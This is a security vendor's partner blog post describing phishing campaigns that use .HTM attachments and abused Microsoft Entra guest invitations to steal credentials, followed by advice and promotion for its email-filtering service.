Cyber attackers are increasingly leveraging .HTM files and Microsoft’s own Entra B2B collaboration features to execute stealthy phishing campaigns. These attacks mimic service renewals, payment notices, or guest invitations — and they’re designed to pass through Microsoft’s own defences.
How it Works
-
.HTM Files: The emails include a .htm file attachment, and are disguised as a trusted document like a payment or renewal notice. Once clicked, users are taken to a fake browser-based login page designed to harvest credentials or initiate silent malware installation.
-
Microsoft Entra: Cybercriminals are spinning up rogue Microsoft 365 tenants and abusing Microsoft’s Entra B2B collaboration system to send guest invitations that appear completely legitimate. The emails typically carry a renewal or payment notification with an urgent call to action and while they’re delivered from trusted Microsoft domains and IPs, the intent behind them is anything but.
-
Trusted Microsoft Infrastructure: The emails are sent from Microsoft’s own invites@microsoft.com address, allowing them to pass SPF, DKIM and DMARC tests and they include links to legitimate Microsoft services, like myapplications.microsoft.com
“Adversaries are leveraging advanced obfuscation techniques in client-side JavaScript to enable polymorphic and fileless payload deployment, including but not limited to ransomware and remote access trojans (RATs).
By dynamically reconstructing malicious code at runtime and embedding phishing assets within local file structures (e.g., MHTML or SVG containers), attackers bypass static and signature-based detection mechanisms.
These tactics reduce dependency on external C2 infrastructure, instead exploiting in-browser execution contexts (e.g., via DOM-based injection, sandbox evasion, or JavaScript-based content spoofing) to deliver malicious functionality while maintaining operational stealth.”
— Anwar Ibrahim, CTO, MailGuard
Key Points for Partners
- .HTM phishing attachments lead to fake Microsoft login pages that harvest user credentials.
- Entra-based scams send real invitations from Microsoft’s infrastructure, adding dangerous credibility.
- The payloads may be linkless, malware-free, and contextually intelligent — making them difficult to detect using traditional filters.
Here’s What It Looks Like
This is a seemingly innocuous email claiming that your subscription has expired. The sender name is crafted to spoof Microsoft 365 Support, inspiring confidence that it is a legitimate email from a trusted sender.
Clicking the attachment launches a phishing sequence which replicates the Microsoft sign-in process, in an attempt to steal the user’s Microsoft credentials.
And this example impersonates an Account Officer from an export business, asking the recipient to confirm their bank account details before a payment can be processed.
In so doing, the victim is required to provide their username and password in order to view the document.
Here’s an Entra example from invites@microsoft.com that includes templated text claiming to confirm a Microsoft 365 subscription renewal. The real call to action however is a phone number offering a refund, where the cybercriminals conduct a vishing (voice phishing) attack. Victims are met with a fake PayPal support line where attackers harvest login credentials, multi-factor authentication codes, and personal or financial information. If the recipient accepts the Microsoft guest invitation, they become part of the attacker’s rogue tenant. From there, attackers can auto-register malicious applications, harvest OAuth tokens, and access or exfiltrate data via legitimate collaboration paths.
This Entra example is using the same tactic, but uses a different tenant and callback number.
Advice to Share with Clients
Train users to be cautious with all file types, especially unexpected .HTM attachments. Encourage leadership to ask: “What is our current time-to-detect on phishing that bypasses Microsoft?” Speed matters.
Want to learn more or arm your team with the latest insights?
Reach out to your MailGuard Partner Manager today or contact expert@mailguard.com.au.
Your expertise, combined with MailGuard’s leading-edge technologies, gives your clients a decisive advantage.
🚀 Let’s build the future of cyber resilience together.
Keeping Businesses Safe and Secure
Prevention is always better than a cure, and one of the best defences is to encourage businesses to proactively boost their company’s cyber resilience levels to avoid threats landing in inboxes in the first place. The fact that a staggering 94% of malware attacks are delivered by email, makes email an extremely important vector for businesses to fortify.
No one vendor can stop all email threats, so it’s crucial to remind customers that if they are using Microsoft 365 or Google Workspace, they should also have a third-party email security specialist in place to mitigate their risk. For example, using a specialist third-party cloud email solution like MailGuard.
For a few dollars per staff member per month, businesses are protected by MailGuard's specialist, zero zero-day email security. Special Ops for when speed matters! Our real-time zero zero-day, email threat detection amplifies your client’s intelligence, knowledge, security and defence.
MailGuard provides a range of solutions to keep businesses safe, from email filtering to email continuity and archiving solutions. Speak to your clients today to ensure they’re prepared and get in touch with our team to discuss fortifying your client’s cyber resilience.
Talk to us
MailGuard's partner blog is a forum to share information; we want it to be a dialogue. Reach out to us and tell us what your customers need so we can serve you better. You can connect with us on social media or call us and speak to one of our consultants.
Australian partners, please call us on 1300 30 65 10
US partners call 1888 848 2822
UK partners call 0 800 404 8993